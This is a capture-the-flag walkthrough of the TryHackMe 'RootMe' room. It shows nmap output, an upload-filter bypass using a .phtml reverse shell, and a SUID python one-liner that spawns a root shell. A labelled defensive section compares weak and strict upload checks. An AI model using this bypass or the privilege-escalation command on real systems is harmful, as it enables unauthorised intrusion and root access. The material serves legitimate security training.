[THM] RootMe

· Updated on 2026-02-02 · 3179 words

Reconnaissance

An nmap scan of the target found two open ports and the Apache version; port 22 runs an SSH service.

nmap -sV -sC -v 10.48.146.125                                      
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-02 06:48 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Initiating Ping Scan at 06:48
Scanning 10.48.146.125 [4 ports]
Completed Ping Scan at 06:48, 0.25s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:48
Completed Parallel DNS resolution of 1 host. at 06:48, 0.03s elapsed
Initiating SYN Stealth Scan at 06:48
Scanning 10.48.146.125 [1000 ports]
Discovered open port 80/tcp on 10.48.146.125
Discovered open port 22/tcp on 10.48.146.125
Completed SYN Stealth Scan at 06:48, 2.18s elapsed (1000 total ports)
Initiating Service scan at 06:48
Scanning 2 services on 10.48.146.125
Completed Service scan at 06:48, 6.42s elapsed (2 services on 1 host)
NSE: Script scanning 10.48.146.125.
Initiating NSE at 06:48
Completed NSE at 06:48, 5.02s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.67s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Nmap scan report for 10.48.146.125
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4f:df:e3:a0:52:5f:1f:78:76:3e:eb:f1:fe:a8:38:05 (RSA)
| 256 3e:3c:96:f1:84:82:c2:a1:1d:a1:09:45:12:be:99:fb (ECDSA)
|_ 256 c5:44:76:a7:ef:8c:fb:bd:a5:53:51:a2:a7:0c:3b:fc (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.03 seconds
Raw packets sent: 1083 (47.628KB) | Rcvd: 1080 (43.208KB)

Next came the HTTP service on port 80. Brute-forcing directories with dirsearch turned up the /panel/ and /uploads/ directories, both of which looked interesting; opening them in a browser showed that one is a file upload page and the other is the path where uploaded files are stored, so the approach from here is clear.

Getting a shell

A PHP reverse shell is enough here, but the upload page checks the file extension: .php is not allowed, but renaming the file to .phtml got through. I did not try other extensions.
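The extension check described above, as an added example that is not code from the room or this write-up: a deny-list that refuses only .php (a model of the behaviour observed, since the room's real upload code is not on the page) next to an allow-list check, plus a helper that tells which stored names Ubuntu's stock mod_php handler rule would execute.

```python
import os
import re

# Extensions that Ubuntu's stock mod_php configuration hands to the PHP engine
# (its FilesMatch rule is ".+\.ph(ar|p|tml)$"), so .phtml runs exactly like .php.
PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$", re.IGNORECASE)

# Allow-list for the hardened check: a plain basename, one extension, images only.
SAFE_IMAGE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpe?g|png|gif)$", re.IGNORECASE)


def weak_check_allows(filename: str) -> bool:
    """Deny-list check modelled on the room's behaviour: only a '.php' suffix is refused."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext != "php"


def strict_check_allows(filename: str) -> bool:
    """Allow-list check: drop any path, then require a simple image name with one extension.
    Double extensions such as 'shell.php.jpg' fail because the stem may not contain a dot."""
    return SAFE_IMAGE_NAME.match(os.path.basename(filename)) is not None


def executes_as_php(filename: str) -> bool:
    """Whether Apache with Ubuntu's default mod_php rule would run a stored file of this name."""
    return PHP_HANDLER.match(os.path.basename(filename)) is not None


def audit(filename: str) -> dict:
    """Summarise how one upload name fares under both checks (helper constructed for this example)."""
    return {
        "weak_allows": weak_check_allows(filename),
        "strict_allows": strict_check_allows(filename),
        "executes": executes_as_php(filename),
    }


if __name__ == "__main__":
    # Constructed sample names, not taken from the room.
    for name in ("shell.php", "shell.phtml", "shell.phar", "shell.php.jpg", "../cat.png", "cat.png"):
        print(f"{name:15} {audit(name)}")
```

Defence in depth is to also serve the upload directory with PHP execution disabled (php_admin_flag engine off in its Directory block) or to store uploads outside the web root, so a bypassed name check is not enough on its own.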

Then start an nc listener locally, go to the /uploads directory and click the uploaded reverse-shell file to get a shell.

Using find, user.txt turns up under /var/www/, which gives the first flag.

Privilege escalation

SUID privilege escalation: find / -perm -u=s -type f 2> /dev/null lists the root-owned SUID files, and among them is a python2.7 binary, which looked very promising. (For the first answer box I kept entering python2.7, which was wrong; it turned out that just python was expected, which confused me for a while.)

Then check the GTFOBins site for the exploitation method; its SUID entry gives this command: python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

That gives a root shell, and the final flag is easily picked up under /root.